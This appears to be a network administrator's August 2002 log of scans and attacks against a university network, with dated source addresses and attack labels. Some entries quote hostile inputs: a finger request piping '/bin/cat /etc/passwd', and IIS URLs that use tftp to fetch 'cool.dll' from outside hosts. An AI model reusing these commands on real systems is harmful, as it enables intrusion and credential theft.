Short summary of some of the attacks against us for Aug. 2002
year - time EASTERN source_ip[:port] (dns name, if any) attack/scan/notes
2002/08/01-03:30:00.20 68.82.236.114 (pcp01469733pcs.lncstr01.pa.comcast.net) anon ftp attack, CWD overflow attacks.
2002/08/01-03:30:00.20 68.82.236.114 (pcp01469733pcs.lncstr01.pa.comcast.net) scannet for port 21
2002/08/01-05:04:50.91 211.240.35.151 (DIGITODOTCOM,SEOUL,KR) scannet for port 111 - statdx exploit attack
2002/08/01-05:50:58.27 151.201.244.34 (pool-151-201-244-34.pitt.east.verizon.net) scannet for ports 137,445
2002/08/01-07:35:20.53 211.44.112.179 (korea crap) scannet for port 21
2002/08/01-09:39:58.85 151.201.244.34 (pool-151-201-244-34.pitt.east.verizon.net) heavy probe of selected MS servers
2002/08/01-12:53:45.97 213.93.93.11 (e93011.upc-e.chello.nl) nimda attack (file RICHED20.dll)
2002/08/01-13:13:58.80 132.235.197.128 (raubenolt.cns.ohiou.edu) SNMP AgentX/tcp, scan port 161,1080 on boss
2002/08/01-14:03:15.92 213.93.93.11 (e93011.upc-e.chello.nl) ping scan, scannet for ports 139 445, heavy probe of select ips
2002/08/01-15:06:49.25 64.119.98.8 (gelco.cpe.tor.futureway.com) scannet for port 1433
2002/08/01-16:47:48.55 64.119.98.8 (gelco.cpe.tor.futureway.com) attempt multiple MS-SQL sa logins
2002/08/01-18:21:19.58 24.208.177.125 (dhcp024-208-177-125.columbus.rr.com) pound on net printer port 631
2002/08/01-19:59:56.18 12.119.127.22 (AT&T ITS,NJ,US) scannet for port 138
2002/08/01-21:17:44.97 217.128.241.100 (ABordeaux-202-1-1-100.abo.wanadoo.fr) scannet for port 21
2002/08/02-03:29:36.74 217.128.250.49 (AMarseille-201-1-5-49.abo.wanadoo.fr) scannet for port 21
2002/08/02-04:10:21.74 217.128.250.49 (AMarseille-201-1-5-49.abo.wanadoo.fr) scannet for port 21
2002/08/02-06:39:09.61 64.81.195.164 (dsl081-195-164.nyc2.dsl.speakeasy.net) scannet for port 445
2002/08/02-07:01:29.09 64.81.195.164 (dsl081-195-164.nyc2.dsl.speakeasy.net) hit selected ips on port 139
2002/08/02-07:20:47.60 64.81.195.164 (dsl081-195-164.nyc2.dsl.speakeasy.net) scannet for ports 139,445,NETBIOS Samba clientaccess
2002/08/02-08:14:10.43 212.179.7.195 (main.avalon-net.co.il) SNMP AgentX/tcp request 132.235.17.17
2002/08/02-10:29:55.82 66.114.144.57 (pia144-57.pioneernet.net) scannet for port 139
2002/08/02-12:33:52.54 80.11.24.132 (AOrleans-103-1-1-132.abo.wanadoo.fr) scannet for port 21
2002/08/02-13:11:28.49 132.235.130.234 (ouc234.chillicothe.ohiou.edu) scannet for port 80, code red..
2002/08/02-14:18:05.08 132.235.32.72 (lab020-pc72.cob.ohiou.edu) scannet for port 80
2002/08/02-16:39:11.87 62.10.91.235 (ppp-62-10-91-235.dialup.tiscali.it) scannet for port 21
2002/08/03-03:57:01.11 151.201.244.34 (pool-151-201-244-34.pitt.east.verizon.net) scannet for port 139,445
2002/08/03-05:33:51.54 194.8.164.17 (sep.date-spb.ru) use anon ftp to get dummy passwd file from ace
2002/08/03-09:13:41.54 213.189.162.53 (NETWORKIP5BRUTELE,BRUXELLS, BE) scannet for port 21
2002/08/03-09:15:19.54 66.237.120.204 (XO Communications,CA,US) scannet for port 25
2002/08/03-19:31:48.78 195.232.54.17:21 (fra-tgn-oyv-vty17.as.wcom.net) scannet for port 21
2002/08/03-19:32:36.37 195.232.54.17:21 (fra-tgn-oyv-vty17.as.wcom.net) probe port 1524, buff overflow attack port 6112-CDE
2002/08/04-01:45:22.50 172.162.158.190 (ACA29EBE.ipt.aol.com) ping scan of net, port 80 scan, iis attacks
2002/08/04-06:50:50.93 217.35.21.127 (host217-35-21-127.in-addr.btopenworld.com) scannet for port 1433
2002/08/04-07:26:12.48 131.96.115.83 (Development1.gsu.edu) scannet for port 80
2002/08/04-17:25:36.77 24.208.177.125 (dhcp024-208-177-125.columbus.rr.com) bang on network printer port 631
2002/08/05-10:29:00.34 194.98.189.139 (INGENCYS,FR) scannet for port 111, RPC EXPLOIT statdx
2002/08/05-10:35:55.06 205.158.210.172 (XO Communications,CA,US) scannet for port 139
2002/08/05-15:29:05.82 216.221.57.223 (dsl-57-223.aei.ca) scannet for ports 22, 80, 1433, ping
2002/08/05-15:36:38.02 65.198.68.56 (netmapper.research.lumeta.com) probe high ports on several ips UDP 2-3x/hr
2002/08/05-15:37:43.18 216.221.57.223 (dsl-57-223.aei.ca) MS-SQL xp_cmdshell - program execution -> 132.235.18.147
2002/08/05-21:57:17.33 24.208.177.125 (dhcp024-208-177-125.columbus.rr.com) bang on network printer port 631
2002/08/05-22:12:40.69 62.211.252.165 (Telecom Italia,IT) ICMP Broadscan Smurf Scanner
2002/08/06-02:24:52.84 61.182.50.241 (CHINANET Hebei province network,CN) scannet for port 111, RPC EXPLOIT statdx
2002/08/06-03:22:28.43 216.229.196.176 (Mississippi Dept. of Education,MS,US) portscan ace
2002/08/06-05:55:14.72 216.229.196.29 (Mississippi Dept. of Education,MS,US) multiple WWW attacks against ace
2002/08/06-06:46:49.79 130.219.50.151 (Upa-Mail.UMDNJ.EDU) scannet for port 1433
2002/08/06-06:47:51.27 130.219.50.151 (Upa-Mail.UMDNJ.EDU) scannet for port 1433
2002/08/06-06:51:17.51 130.219.50.151 (Upa-Mail.UMDNJ.EDU) MS-SQL xp_cmdshell - program execution -> 132.235.18.147, change passwd
2002/08/06-06:51:21.19 210.54.170.105 (ESURF-NZ,NZ) EXPLOIT CDE dtspcd exploit attempt
2002/08/06-08:15:46.24 132.235.196.91 (OU) start of attacks till 2002/08/06-10:42:19.86
2002/08/06-08:15:46.24 132.235.196.91 (OU) portscan 132.235.1.[1,2,3,5], multiple probes on multiple ports followup.
2002/08/06-08:22:02.34 132.235.196.91 (OU) portscan 132.235.1.5
2002/08/06-08:24:06.68 132.235.196.91 (OU) attack ace via finger port w/ cmd |/bin/cat /etc/passwd
2002/08/06-08:31:18.31 132.235.196.91 (OU) portscan 132.235.1.7, multiple probes on multiple ports followup.
2002/08/06-08:45:04.04 132.235.196.91 (OU) portscan 132.235.1.11, multiple probes on multiple ports followup.
2002/08/06-09:12:00.52 132.235.196.91 (OU) portscan 132.235.1.30
2002/08/06-09:26:38.85 132.235.196.91 (OU) portscan 132.235.1.23
2002/08/06-09:35:25.70 132.235.196.91 (OU) portscan 132.235.1.24
2002/08/06-10:16:55.24 141.154.5.71 (Applied Metrix,MA,US) scannet for port 139
2002/08/06-12:42:17.82 64.226.243.8 (testrax.com) scannet for port 1433
2002/08/06-13:24:08.68 64.226.243.8 (testrax.com) MYSQL attacks - xp_cmdshell - program execution, password change
2002/08/06-17:42:52.98 211.141.65.4 (China Mobile Communications Corporation,CN) scannet for port 21
2002/08/06-18:11:15.10 65.92.21.47 (HSE-London-ppp3510065.sympatico.ca) scannet for port 80
2002/08/06-20:31:44.69 195.128.139.141 (139-141-dialup.samara.ru) use anon ftp to get dummy passwd file from ace
2002/08/06-22:11:41.26 196.40.44.38 (Frente Universidad Braulio Carrillo, Paseo Colon,CR) scannet for port 1433
2002/08/06-23:09:42.65 66.66.31.23 (syr-66-66-31-23.twcny.rr.com) scannet for port 1433
2002/08/07-00:20:33.65 218.52.9.9 (Hanaro Telecom Co.,KR) scannet for port 1433
2002/08/07-05:45:19.98 80.35.246.93 (93.Red-80-35-246.pooles.rima-tde.net) anon ftp dummy passwd file from ace
2002/08/07-09:11:14.81 66.214.132.105 (66-214-132-105.gln-res.charterpipeline.net) scannet for port 1433
2002/08/07-11:13:21.49 217.96.243.172 (pc172.jeleniag.sdi.tpnet.pl) scannet for port 22
2002/08/07-11:36:33.10 62.47.0.170 (N454P010.adsl.highway.telekom.at) scannet for port 21
2002/08/07-12:07:38.17 138.238.5.135 (Howard University ,WASHINGTON DC,US) scannet for port 445
2002/08/07-12:08:27.90 140.114.106.17 (ael.ns.nthu.edu.tw) scannet for port 445
2002/08/07-12:08:45.68 149.169.38.83 (cc17.eas.asu.edu) scannet for port 445
2002/08/07-12:09:36.68 207.5.240.126 (d-207-5-240-126.s-way.com) scannet for port 445
2002/08/07-12:13:17.87 138.238.143.150 (Howard University ,WASHINGTON DC,US) scannet for port 445
2002/08/07-12:16:52.14 4.60.101.60 (lsanca1-ar11-4-60-101-060.lsanca1.dsl-verizon.net) scannet for port 445
2002/08/07-12:17:45.48 140.114.79.64 (ants14.cs.nthu.edu.tw) scannet for port 445
2002/08/07-12:32:59.52 65.198.68.56 (netmapper.research.lumeta.com) slow scan of high ports on 132.235.1.3
2002/08/07-17:38:09.51 62.0.5.220 (Kinneret,IL) IIS attack w/cmd tftp%20-i%20132.147.17.220%20GET%20cool.dll%20c:\httpodbc.dll
2002/08/07-22:20:53.25 194.206.91.3 (JET LAG,FR) scannet for port 46682
2002/08/08-05:46:45.75 218.2.166.23 (CHINANET jiangsu province network) scannet for ports 8080,8888,10088,81,3128,80,1813,5262
2002/08/09-04:00:39.49 64.58.166.193 (64-58-166-193.cbi.cox-oc.net) scannet for port 6112
2002/08/09-10:35:25.20 129.217.25.2 (minasmorgul.cs.uni-dortmund.de) probe ace ports 4402,4403,4404
2002/08/09-10:56:09.45 217.82.38.139 (pD952268B.dip.t-dialin.net) scannet for port 445, followups to select ips ports 80,156,3306, 445 1112 1433 1434 etc
2002/08/09-14:43:11.90 172.186.71.74 (ACBA474A.ipt.aol.com) scannet for port 21
2002/08/09-15:28:44.50 216.77.9.139 (Bellsouth.net, Inc.,GA,US) scannet for port 139
2002/08/09-17:01:35.81 66.56.174.10 (gso56-174-010.triad.rr.com) scannet for port 80, multiple IIS attacks on multiple servers.
2002/08/09-18:03:39.10 204.141.115.253 (Verio, Inc. ) 1. attack IIS server 132.235.18.102 w/ ftp to 209.207.210.164 w/cmd
2002/08/09-18:03:39.10 204.141.115.253 (Verio, Inc. ) 2. %20/ServUDaemon.ini%20c:\test.ini>>c:\config.txt
2002/08/09-21:05:20.58 213.98.20.99 (213-98-20-99.uc.nombres.ttd.es) use anon ftp to get dummy passwd file from ace
2002/08/10-04:54:55.23 209.61.184.243 (Rackspace.com ,TX, US) scannet for port 139,445,137
2002/08/10-08:10:34.12 24.54.36.84 (Adelphia Cable ,PA,US) scannet for port 1433
2002/08/10-12:58:09.35 211.192.214.148 (korea crap) scannet for port 1433
2002/08/10-15:07:00.52 207.224.28.89 (mail.glickhead.com) scannet for port 21
2002/08/11-03:20:31.95 24.66.43.26 (h24-66-43-26.wp.shawcable.net) scannet for port 139,445,137
2002/08/11-05:17:24.97 65.128.207.177 (0-1pool207-177.nas13.philadelphia1.pa.us.da.qwest.net) scannet for port 21
2002/08/11-09:05:13.52 212.195.186.19 (lns14v-3-19.w.club-internet.fr) scannet for port 21
2002/08/11-10:34:49.73 212.185.235.80 (pD4B9EB50.dip.t-dialin.net) scannet for port 139,445,137
2002/08/11-15:02:24.57 24.66.43.26 (h24-66-43-26.wp.shawcable.net) scannet for port 139,445,137
2002/08/11-16:47:33.29 172.156.230.197 (America Online) scannet for port 1433
2002/08/11-18:48:26.61 217.228.148.186 (pD9E494BA.dip.t-dialin.net) ping scan of net
2002/08/11-22:38:49.65 24.123.46.10 (rrcs-central-24-123-46-10.biz.rr.com) scannet for port 515
2002/08/12-01:46:09.96 131.178.225.177 (auditoria.itesm.mx) scannet for port 1433
2002/08/12-02:23:03.52 211.45.138.206 (KUMI COMPUTER CLASS,SEOUL,KR) scannet for port 1433
2002/08/12-06:49:47.23 147.102.177.1 (iktinos.arch.ntua.gr) scannet for port 1433
2002/08/12-06:50:47.84 80.178.3.75 (Golden Lines International Communication Services Ltd.,IL) scannet for port 1433
2002/08/12-06:57:03.76 147.102.177.1 (iktinos.arch.ntua.gr) scan net w/ ICMP webtrends scanner
2002/08/12-06:58:39.42 147.102.177.1 (iktinos.arch.ntua.gr) try to logon to MS-SQL: server as user sa/
2002/08/12-07:35:23.05 147.102.177.1 (iktinos.arch.ntua.gr) ICMP scan of net with webtrends scanner
2002/08/12-10:45:33.33 195.61.21.200 (generic.sema.es) use anon/ftp to get passwd file from ace
2002/08/12-11:10:05.64 65.56.79.86 (dialup-65.56.79.86.Dial1.Miami1.Level3.net) scannet for port 139
2002/08/12-12:30:35.69 217.124.12.133 (217-124-12-133.dialup.nuria.telefonica-data.net) use anon/ftp to get passwd file from ace
2002/08/12-14:15:38.59 217.88.219.165 (pD958DBA5.dip.t-dialin.net) scannet for port 1433
2002/08/12-15:11:31.36 80.13.241.77 (AAmiens-106-1-11-77.abo.wanadoo.fr) scannet for port 21
2002/08/12-17:39:16.37 12.240.132.28 (AT&T ITS ,NJ,US) scannet for port 1433
2002/08/12-21:38:11.75 211.162.79.99 (SHENZHEN,GUANGDONG,CHINA,CN) scannet for port 8080,80
2002/08/13-01:20:18.52 211.91.218.140 (Changsha xiangya hospital,CN) probe 132.235.37.68 : 8080
2002/08/13-03:33:26.68 4.47.20.5 (chcgil2-ar6-4-47-020-005.chcgil2.elnk.dsl.genuity.net) scannet for port 1433,80
2002/08/13-03:33:57.32 4.47.20.5 (chcgil2-ar6-4-47-020-005.chcgil2.elnk.dsl.genuity.net) scannet for port 1433,80
2002/08/13-03:50:19.91 209.21.92.165 (Amernet,CA,US) scannet for port 21
2002/08/13-03:50:28.44 209.21.92.165 (Amernet , CA, US) scannet for port 21
2002/08/13-07:00:09.15 217.88.215.24 (pD958D718.dip.t-dialin.net) scannet for port 80
2002/08/13-08:26:10.16 80.116.216.200 (host200-216.pool80116.interbusiness.it) MS_SQL sa login failed on multiple machines
2002/08/13-08:46:03.88 216.112.5.130 (w130.z216112005.sjc-ca.dsl.cnc.net) scannet for port 80,1433
2002/08/13-14:13:12.33 12.254.182.103 (12-254-182-103.client.attbi.com) scannet for port 1433
2002/08/13-16:26:06.59 67.81.65.166 (ool-435141a6.dyn.optonline.net) scannet for port 445,80
2002/08/13-17:15:25.79 67.34.60.23 (adsl-34-60-23.mia.bellsouth.net) scannet for port 139,445
2002/08/13-17:29:03.01 67.34.88.204 (adsl-34-88-204.mia.bellsouth.net) scannet for port 139,445
2002/08/13-17:56:33.71 68.69.208.14 (oh-strongsvillecadent1-1aa-14.clvhoh.adelphia.net) probe 132.235.1.11 ports 6500,21,23
2002/08/13-22:44:54.52 146.115.74.86 (146-115-74-86.c3-0.lex-ubr1.sbo-lex.ma.cable.rcn.com) try anon/ftp to get passwd file on ace
2002/08/14-00:56:27.28 205.185.236.188 (as02.def-mi-0-188.rasserver.net) scannet for port 139,445,80,137
2002/08/14-10:39:46.52 213.120.107.231 (host213-120-107-231.in-addr.btopenworld.com) scannet for ports 80,445,139,137
2002/08/14-14:09:52.05 212.135.119.242 (Delta Books International,SURREY,GB) scannet for port 1433
2002/08/14-15:39:33.07 66.134.183.195 (h-66-134-183-195.DNVTCO56.covad.net) scannet for port 21
2002/08/14-15:52:15.56 202.99.44.243 (CHINANET Beijing province network) scannet for port 21
2002/08/14-16:02:02.59 65.198.68.56 (netmapper.research.lumeta.com) bang on 132.235.1.3 1 packet per hour
2002/08/14-16:51:49.72 205.185.237.212 (as11.def-mi-0-212.rasserver.net) scannet for port 139,445,80,137
2002/08/14-22:36:38.13 63.10.144.27 (1Cust27.tnt14.lax7.da.uu.net) scannet for port 1433
2002/08/14-23:07:21.86 80.230.208.212 (Euronet Digital Communications.IL) scannet for port 1433
2002/08/15-06:12:08.41 80.139.213.119 (p508BD577.dip.t-dialin.net) CDE dtspcd exploit attempts
2002/08/15-10:43:57.09 61.94.153.102 (PT. Telekomunikasi Indonesia,ID) probe ace ports 79,23,80,143,53,110,23,111,80
2002/08/15-12:08:03.27 212.211.94.21 (fra-tgn-oyo-vty21.as.wcom.net) scannet for port 21
2002/08/15-12:09:02.33 210.228.155.50 (Telecom Staff, Inc,JP) anon ftp buff overflow attacks (RNFR ./././././././.)
2002/08/15-14:04:08.39 64.162.177.182 (adsl-64-162-177-182.dsl.lsan03.pacbell.net) attempt to get .htpasswd file
2002/08/15-14:29:14.41 80.139.213.119 (p508BD577.dip.t-dialin.net) CDE dtspcd exploit attempts
2002/08/15-22:31:31.76 68.49.111.238 (pcp771969pcs.dalect01.va.comcast.net) scannet for ports 80,445
2002/08/16-06:50:29.41 196.28.49.120 (196-28-49-120.prtc.net) scannet for port 1433
2002/08/16-08:35:26.04 61.171.34.149 (CHINANET Shanghai province network) portscan net for ports 80,8080,8888,8000,81,10080,1080,3128
2002/08/16-09:20:31.48 80.235.22.34 (80-235-22-34-dsl.plus.estpak.ee) scannet for port 1433
2002/08/16-10:22:06.13 61.166.251.87 (CHINANET Yunnan province network) scannet for port 8080,80,8000,10080,81,3128,8888
2002/08/16-12:23:31.45 209.149.209.141 (Bellsouth.net, Inc. ) scannet for port 515
2002/08/16-20:19:05.36 216.221.63.141 (dsl-63-141.aei.ca) probe ports 139,137,445 on multiple ips
2002/08/16-23:08:47.71 211.144.94.54 (Cable OnLine Network YANGPU2POPNet,SHANGHI,CN) scannet for ports 8080,80,8000,3128,1080,1813
2002/08/16-23:28:58.22 68.41.51.130 (bgp946576bgs.canton01.mi.comcast.net) scan 132.235.1.11 port 8080
2002/08/17-00:13:44.71 24.208.180.192 (dhcp024-208-180-192.columbus.rr.com) portscan 132.235.1.7
2002/08/17-00:34:17.02 24.205.20.225 (24-205-20-225.mpk-eres.charterpipeline.net) scannet for port 445
2002/08/17-00:34:17.37 142.177.235.230 (nat235-230.mpoweredpc.net) scannet for port 445
2002/08/17-00:34:28.61 24.103.36.47 (CPE00e0182293b8-CM0010954a63e0.cpe.net.cable.rogers.com) scannet for port 445
2002/08/17-00:35:29.51 142.177.242.55 (islandtelecom242-55.islandtelecom.com) scannet for port 445
2002/08/17-00:35:46.27 129.100.227.115 (University of Western Ontario,CA) scannet for port 445
2002/08/17-00:35:56.52 24.205.133.228 (24-205-133-228.mpk-eres.charterpipeline.net) scannet for port 445
2002/08/17-00:36:15.92 24.103.211.67 (CPE014490007213.cpe.net.cable.rogers.com) scannet for port 445
2002/08/17-03:25:59.25 66.159.16.26 (server.iicinternet.com) scan several ips for port 1080
2002/08/17-12:13:11.55 207.90.89.75 (d74.as0.wlmg.oh.voyager.net) probe mult. ips on ports 111, 32773, 79-(operator, user)
2002/08/17-15:53:27.07 193.224.239.199 (utbontas.fph.hu) scannet for port 1433
2002/08/17-16:11:14.36 68.49.111.238 (pcp771969pcs.dalect01.va.comcast.net) scannet for ports 80,445
2002/08/17-19:31:13.21 24.123.46.10 (rrcs-central-24-123-46-10.biz.rr.com) scannet for port 515
2002/08/17-22:45:26.53 12.251.202.108 (12-251-202-108.client.attbi.com) scannet for ports 80,445
2002/08/18-00:24:31.34 80.32.136.101 (101.Red-80-32-136.pooles.rima-tde.net) scannet for port 21
2002/08/18-07:53:27.95 195.204.147.80 (www-sec-1.nndata.no) scannet for port 1433
2002/08/18-15:08:41.46 203.69.248.194 (CHTD, Chunghwa Telecom Co.,Ltd.,TW) scannet for port 21
2002/08/19-01:46:45.46 128.187.146.13 (rbyoung.byu.edu) scannet for ports 445, 139, 1433, 137,
2002/08/19-07:29:18.28 61.70.190.178 () cde buff overflow attack on 132.235.15.206
2002/08/19-08:39:14.72 193.170.208.73 () scannet for port 1433
2002/08/19-08:44:47.04 193.170.208.73 () scannet for port 1433
2002/08/19-11:59:51.04 203.115.15.12 () scannet for port 1433
2002/08/19-12:06:20.03 203.115.15.12 () scannet for port 1433
2002/08/19-14:21:44.06 64.221.30.76 () scannet for port 22
2002/08/19-15:22:01.03 141.158.125.34 () scannet for port 139
2002/08/19-18:47:10.12 67.81.105.74 () scannet for port 139 445
2002/08/19-19:24:27.07 142.177.235.230 () scannet for port 139 445
2002/08/20-02:00:46.81 24.114.42.75 () scannet for port 445,80
2002/08/20-02:13:32.12 24.114.42.75 () scannet for port 80 445
2002/08/20-02:17:22.88 24.188.140.73 () scannet for port 445,80
2002/08/20-02:25:07.14 172.152.41.45 () scannet for port 139
2002/08/20-03:18:29.31 24.188.140.73 () scannet for port 445 139
2002/08/20-06:47:35.94 213.26.231.207 (ASKESIS SRL,IT) scannet for port 1214
2002/08/20-09:55:25.69 213.189.162.53 (Brutele SC,BRUXELLES,BE) scannet for port 21
2002/08/20-13:00:10.84 12.151.200.201 (PLUMROSE USA,MS,USS) scannet for port 1433
2002/08/20-14:28:41.25 216.65.197.97 (Dallas IDC ,TX,US) scannet for port 1433
2002/08/20-17:41:56.59 24.114.42.75 (Rogers Cable Inc.,ONTARIO,CA) start of continuous probes on port 445 on all IPS. till 00:37:26
2002/08/20-17:46:42.75 80.32.194.79 (79.Red-80-32-194.pooles.rima-tde.net) ftp dummy passwd file from ace
2002/08/20-18:25:05.95 213.139.24.166 (Grupo Munreco,SPAIN) scannet for port 1433
2002/08/20-19:56:09.89 217.85.38.163 (pD95526A3.dip.t-dialin.net) scannet for port 80, IIS attacks
2002/08/20-21:48:29.09 212.202.220.26 (GINKO Gesellschaft fuer Internet-Kommunikation mbH,DE) scannet for port 1433
2002/08/20-21:48:49.01 212.202.220.26 (GINKO Gesellschaft fuer Internet-Kommunikation mbH,DE) ICMP superscan echo of net
2002/08/20-23:28:14.87 61.96.25.242 (DREAMX-CATV-HAMANBS-KR,KR) scannet for port 1433
2002/08/21-06:17:43.58 195.55.30.27 (PRINCAST,ES) ftp dummy passwd file from ace
2002/08/21-06:28:05.37 24.43.54.240 (CPE0080c6f02f26.cpe.net.cable.rogers.com) scannet for port 445
2002/08/21-06:29:09.87 24.43.54.240 (CPE0080c6f02f26.cpe.net.cable.rogers.com) start of continuous probes on port 445 till 14:36:16.66
2002/08/21-08:18:56.25 195.55.30.27 (Principado de Asturias,ES) repeatedly try to anon ftp /etc/passwd.bak
2002/08/21-11:37:22.65 80.11.152.94 (AToulouse-105-1-11-94.abo.wanadoo.fr) scannet for port 21
2002/08/21-12:27:43.62 165.176.10.46 (Commonwealth of Virginia Department of Information Technology,US) scannet for port 1433
2002/08/21-14:02:38.29 68.55.123.37 (pcp343900pcs.owngsm01.md.comcast.net) scannet for port 139
2002/08/21-16:23:06.09 64.192.211.105 (dsl-64-192-211-105.telocity.com) scannet for port 21
2002/08/21-16:28:43.20 64.251.6.192 (IHosting,FL,US) scannet for ports 1080,3128
2002/08/21-17:15:58.84 61.172.246.78 (Shanghai Information Industrial Co.,CN) scannet for port 1080
15.112.148.195.IN-ADDR.ARPA domain name pointer vi015.piramk.fi
2002/08/21-17:35:56.59 63.196.59.36 (adsl-63-196-59-36.dsl.lsan03.pacbell.net) scannet for port 139
2002/08/21-17:47:18.09 194.85.32.18 (Federal Node RUNNet in IFMO,St.Petersburg,RU) scannet for port 1080
2002/08/21-23:27:19.58 217.231.201.87 (pD9E7C957.dip.t-dialin.net) use anon /ftp to get /etc/passwd on ace
2002/08/21-23:43:00.74 217.231.254.153 (pD9E7FE99.dip.t-dialin.net) try to login to ace w/decrypted passwds from dummy passwd file.
2002/08/21-23:50:47.44 217.231.249.105 (pD9E7F969.dip.t-dialin.net) use anon /ftp to get /etc/passwd.bak on ace
2002/08/21-23:59:40.04 217.231.249.105 (pD9E7F969.dip.t-dialin.net) use anon /ftp to get /etc/passwd on ace
2002/08/22-00:39:33.50 66.150.8.30 (www.integrityonline.com) scannet for port 1433
2002/08/22-02:23:02.68 66.150.8.30 (www.integrityonline.com) try to login to SQL server as user sa on several ips
2002/08/22-02:34:40.15 68.82.236.96 (pcp01469715pcs.lncstr01.pa.comcast.net) scannet for port 21
2002/08/22-02:58:44.56 80.19.101.23 (host23-101.pool8019.interbusiness.it) scannet for port 139
2002/08/22-05:07:15.30 193.230.177.204 (Reteaua Canad Systems, Internet Service Provider,RO) try to telnet to boss as test/test, student/student
2002/08/22-05:37:17.20 195.27.218.62 (BMW AG,MUNICH,GD) probe port 6000 on several ips
2002/08/22-06:57:00.98 211.161.121.8 (FOR GWBN WUHAN LAODONG STREET ,CN) scannet for port 1433
2002/08/22-06:57:16.14 211.161.121.8 (GWBN WUHAN LAODONG STREET #2 PHASE (broadband), CN) scannet for port 1433
2002/08/22-10:20:32.05 61.147.60.129 (CHINANET jiangsu province network) attack IIS server-tftp%20-i%20132.235.80.31%20GET%20cool.dll
2002/08/22-10:37:56.16 210.83.207.251 (China Netcom Corp.,CN) scannet for port 21
2002/08/22-12:33:47.01 67.240.60.203 (1Cust203.tnt4.winston-salem.nc.da.uu.net) scannet for port 139
2002/08/22-13:15:42.22 195.148.112.15 (vi015.piramk.fi) scannet for port 1433. probe sql servers.
2002/08/22-16:53:24.90 211.75.49.156 (CHTD, Chunghwa Telecom Co.,Ltd.,TW) scannet for port 23,21
2002/08/22-16:54:17.30 211.75.49.156 (CHTD, Chunghwa Telecom Co.,Ltd.,TW) telnet solaris memory mismanagement exploit attempt
2002/08/22-19:48:16.16 61.177.255.218 (CHINANET jiangsu province network) attack IIS server-tftp%20-i%20132.235.80.31%20GET%20cool.dll
2002/08/22-19:54:06.11 207.224.28.89 (mail.glickhead.com) scannet for port 21
2002/08/22-21:03:24.57 209.47.27.187 (user187.accesscable.com) 1. hack windows box, install irc server (reflector?)
2002/08/22-21:03:24.57 209.47.27.187 (user187.accesscable.com) 2. install ftp on port 1024
2002/08/23-00:33:15.88 61.1.50.190 (Bharat Sanchar Nigam Limited,IN) scannet for port 139